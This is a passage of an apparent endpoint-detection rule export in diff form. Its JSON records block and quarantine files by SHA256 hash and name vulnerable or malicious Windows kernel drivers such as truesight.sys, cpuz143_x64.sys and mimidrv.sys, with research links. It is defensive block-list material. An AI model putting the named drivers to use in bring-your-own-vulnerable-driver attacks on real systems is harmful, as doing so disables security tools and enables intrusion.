[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35f8a780-3ead-59f1-aa74-933a96e9648f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825744Z", + "creation_date": "2026-03-23T11:45:30.825746Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.825752Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "505fbf8c447320aaedfedb02b64423cc2140b328aa6da4ed23ecf2067ffb1d81", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "35fd48f6-e87c-5aa1-9f95-cf0da201d14c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471991Z", + "creation_date": "2026-03-23T11:45:31.471994Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472004Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50d7f7fa334582eaee68abf8215a1283c0a3e405e601e56ea41aa9553570907d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "360a960b-449a-59f2-b7b6-163f6c75de6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836011Z",
+ "creation_date": "2026-03-23T11:45:30.836013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bda2d609bd41e2c29f81803be5cc8a15984a041ac77a34fabd9a806897c24cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "360be8d1-017d-5cd4-98e2-f34155bebab0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145075Z",
+ "creation_date": "2026-03-23T11:45:32.145077Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef9d653aaa2e629b211cd367a32c381eba694ba85682b987497c287d7dbc0082",
+ "comment": "Malicious Kernel Driver (aka driver_ef9d653a.sys) [https://www.loldrivers.io/drivers/14e51012-5429-483e-9423-49778c3bd1c2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3612f005-dc2b-5239-ad5e-60a5b0124529",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480788Z",
+ "creation_date": "2026-03-23T11:45:30.480790Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38e6d7c2787b6289629c72b1ec87655392267044b4e4b830c0232243657ee8f9",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3613dbd0-1369-59a2-b68e-9e4b8246a9a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611640Z",
+ "creation_date": "2026-03-23T11:45:29.611642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611647Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "536333c1fb9066a12c7791b740fcf637f6f86b45bd57baf0f27ae33c3b6c6cf1",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36151a0f-f877-504d-9ba1-ecac6dc52113",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827664Z",
+ "creation_date": "2026-03-23T11:45:30.827666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2faedf73d553ccbb206f8e2cd9e758c0bc0362cfb8d75e551f044407e02f0d75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3615e11d-43ea-5afe-8a3f-45a9116bf814",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145712Z",
+ "creation_date": "2026-03-23T11:45:31.145714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec98851bf8f19d301efb0d8b4b9724f038a784e20421a62696bbdeae5e20f050",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3622bac0-a61e-5c2a-a714-3c29a77750a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474780Z",
+ "creation_date": "2026-03-23T11:45:31.474784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474795Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09dcdc4c882022babb23af2ac0bbac4535fcc9fc8e60bf415f00ebba2adaf86d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "362a5491-56e1-54c0-a8f9-435f25ad9131",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979977Z",
+ "creation_date": "2026-03-23T11:45:29.979979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979985Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f",
+ "comment": "Vulnerable Kernel Driver (aka nt3.sys) [https://www.loldrivers.io/drivers/d5118882-6cdd-4b06-8bf4-e9818f16137e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36342af2-1c23-5d26-a3af-35895359705f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477170Z",
+ "creation_date": "2026-03-23T11:45:30.477174Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477183Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7227377a47204f8e2ff167eee54b4b3545c0a19e3727f0ec59974e1a904f4a96",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3636d07a-fc26-5677-b6c2-7b5f7d12aab2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146953Z",
+ "creation_date": "2026-03-23T11:45:31.146955Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146960Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e020d0095c96b3bb246b7884b0c7700b62a8cadb18b8de44cc0e4852e74596e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "363af1b8-6f28-5465-87dd-44e21b7620bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978668Z",
+ "creation_date": "2026-03-23T11:45:29.978670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1718a005232d1261894b798a60c73d971416359b70d0e545d7e7a40ed742b71",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "363c9e90-3af4-5b54-8ab6-4b8e3345f218",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480431Z",
+ "creation_date": "2026-03-23T11:45:30.480433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6023b8fd2ce4ad2f3005a53aa160772e43fe58da8e467bd05ab71f3335fb822",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3644289b-1d3d-5609-8a48-0e20053b969c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826938Z",
+ "creation_date": "2026-03-23T11:45:30.826940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826952Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e8d345e25502abe87f46b78f31b290c202855e50fb302e765298b21e6868ec0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36567fad-de9b-53b6-8d2c-9bc0b9883e68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148001Z",
+ "creation_date": "2026-03-23T11:45:31.148003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ca5f440d25b04318b450b527a9696a040d9801b88461ac4aa7e133799add08b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3657d8e3-a9f8-5207-bdba-da0d32887f6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495547Z",
+ "creation_date": "2026-03-23T11:45:31.495549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2eb35a8ca7ce6149d6dc9380bb0883ea4a5822abc94c1e64780590534c4a4a5f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "365a1850-b4c9-534c-9fc6-c003e10b3af9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157612Z",
+ "creation_date": "2026-03-23T11:45:31.157615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "693ff41be1f95fb1f55f4ab3ef610a4b0bdfda21b992e00fcbd76aab8634ad69",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "365c12b6-39eb-5073-bddb-6762cc990a54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467648Z",
+ "creation_date": "2026-03-23T11:45:30.467651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e0133cfe93c0e1cdd995b8668134bafcd35976c8f02400112668d91da7eb34a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3667d275-1bbb-506a-bce3-d09de825f969",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810326Z",
+ "creation_date": "2026-03-23T11:45:31.810328Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62507931949cdad75b4d46bc2a7997514a5f618a532958d2a1c31d5a6870ecf8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "366873f6-6c59-5ac2-bd5e-ce5a125421d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479367Z",
+ "creation_date": "2026-03-23T11:45:31.479371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e90c7a07cf0d7bbc73d334a912ea1d4e079658daf2a2a081776004764d25fa7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36720b49-0576-5349-a2ed-5e9df03a30fb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824438Z",
+ "creation_date": "2026-03-23T11:45:30.824440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e47d93196bb62140f65d8e860b93fd4a9b280f8a559487b5349356d1d301c69b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36759e85-e912-53a4-bbc1-abcd17371ea6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
